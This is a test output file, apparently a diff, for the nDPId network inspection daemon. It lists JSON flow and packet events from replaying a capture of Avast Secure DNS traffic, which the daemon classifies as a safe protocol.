-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482396199,"flow_last_seen":1625482396199,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482396199,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":63776,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482396199,"flow_last_seen":1625482396199,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482396199,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":63776,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1625482396320,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625482396320,"pkt":"YDjgxTWgeJS0JASgCABFAADMN0IAADMRs2e11iOVwKgCZAG7+SAAuJzBl06BgAABAAEAAAAAATIJc0VDdVJlZG5TBUFWQVN0A0NPbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482399044,"flow_last_seen":1625482399044,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482399044,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50008,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1625482399044,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625482399044,"pkt":"eJS0JASgYDjgxTWgCABFAABD9g4AAH8RqSPAqAJktdYjlcNYAbsAL0Y+i0sBAAABAAAAAAAAATIJU0VjVVJFRG5TBUF2QXN0A0NvbQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482399044,"flow_last_seen":1625482399044,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482399044,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50008,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482399044,"flow_last_seen":1625482399044,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482399044,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50008,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1625482399165,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625482399165,"pkt":"YDjgxTWgeJS0JASgCABFAADMOy8AADIRsHq11iOVwKgCZAG7w1gAuL6si0uBgAABAAEAAAAAATIJU0VjVVJFRG5TBUF2QXN0A0NvbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482401089,"flow_last_seen":1625482401089,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482401089,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49737,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1625482401089,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625482401089,"pkt":"eJS0JASgYDjgxTWgCABFAABD9hIAAH8RqR\/AqAJktdYjlcJJAbsAL3PfnlkBAAABAAAAAAAAATIJc0VjVVJFZE5zBUFWYXNUA2NvTQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482401089,"flow_last_seen":1625482401089,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482401089,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49737,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482401089,"flow_last_seen":1625482401089,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482401089,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49737,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1625482401211,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625482401211,"pkt":"YDjgxTWgeJS0JASgCABFAADMPeEAADIRrci11iOVwKgCZAG7wkkAuOxNnlmBgAABAAEAAAAAATIJc0VjVVJFZE5zBUFWYXNUA2NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482484544,"flow_last_seen":1625482484544,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482484544,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51887,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1625482484544,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625482484544,"pkt":"eJS0JASgYDjgxTWgCABFAABD\/EEAAH8RovDAqAJktdYjlcqvAbsAL8hTAb8BAAABAAAAAAAAATIJU0VDVXJlRG5zBUFWYXN0A0NvTQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482484544,"flow_last_seen":1625482484544,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482484544,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51887,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482484544,"flow_last_seen":1625482484544,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482484544,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51887,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1625482484661,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625482484661,"pkt":"YDjgxTWgeJS0JASgCABFAADMsJIAADIROxe11iOVwKgCZAG7yq8AuEDCAb+BgAABAAEAAAAAATIJU0VDVXJlRG5zBUFWYXN0A0NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482484661,"flow_last_seen":1625482484661,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482484661,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60127,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1625482484661,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625482484661,"pkt":"eJS0JASgYDjgxTWgCABFAABD\/D0AAH8RovTAqAJktdYjlerfAbsAL5AIOXoBAAABAAAAAAAAATIJc0VjVXJlZE5TBUF2YXN0A2NPTQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482484661,"flow_last_seen":1625482484661,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482484661,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60127,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482484661,"flow_last_seen":1625482484661,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482484661,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60127,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1625482484661,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625482484661,"pkt":"YDjgxTWgeJS0JASgCABFAADMo38AADIRSCq11iOVwKgCZAG76t8AuAh3OXqBgAABAAEAAAAAATIJc0VjVXJlZE5TBUF2YXN0A2NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482486856,"flow_last_seen":1625482486856,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482486856,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54546,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1625482486856,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625482486856,"pkt":"eJS0JASgYDjgxTWgCABFAABD\/EUAAH8RouzAqAJktdYjldUSAbsAL8JN\/WEBAAABAAAAAAAAATIJc2VDVXJlZG5TBUFWQXN0A0NPTQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482486856,"flow_last_seen":1625482486856,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482486856,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54546,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482486856,"flow_last_seen":1625482486856,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482486856,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54546,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1625482486976,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625482486976,"pkt":"YDjgxTWgeJS0JASgCABFAADMt\/IAADMRMre11iOVwKgCZAG71RIAuDq8\/WGBgAABAAEAAAAAATIJc2VDVXJlZG5TBUFWQXN0A0NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00568{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":53,"packets-processed":52,"total-skipped-flows":0,"total-l4-payload-len":5590,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":26,"total-detection-updates":0,"total-updates":0,"current-active-flows":8,"total-active-flows":26,"total-idle-flows":18,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":133,"global_ts_msec":1625482998213} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482998213,"flow_last_seen":1625482998213,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482998213,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64432,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1625482998213,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625482998213,"pkt":"eJS0JASgYDjgxTWgCABFAABDf48AAH8RH6PAqAJktdYjlfuwAbsAL9NLpcUBAAABAAAAAAAAATIJc0VjdVJlZE5TBUF2YXNUA0NvTQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482998213,"flow_last_seen":1625482998213,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482998213,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64432,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482998213,"flow_last_seen":1625482998213,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482998213,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64432,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1625482998333,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625482998333,"pkt":"YDjgxTWgeJS0JASgCABFAADM\/oEAADMR7Ce11iOVwKgCZAG7+7AAuEu6pcWBgAABAAEAAAAAATIJc0VjdVJlZE5TBUF2YXNUA0NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482318517,"flow_last_seen":1625482318634,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51415,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482396199,"flow_last_seen":1625482396320,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":63776,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482401089,"flow_last_seen":1625482401211,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49737,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482484544,"flow_last_seen":1625482484661,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51887,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482484661,"flow_last_seen":1625482484661,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60127,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482399044,"flow_last_seen":1625482399165,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50008,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482316411,"flow_last_seen":1625482316532,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64494,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 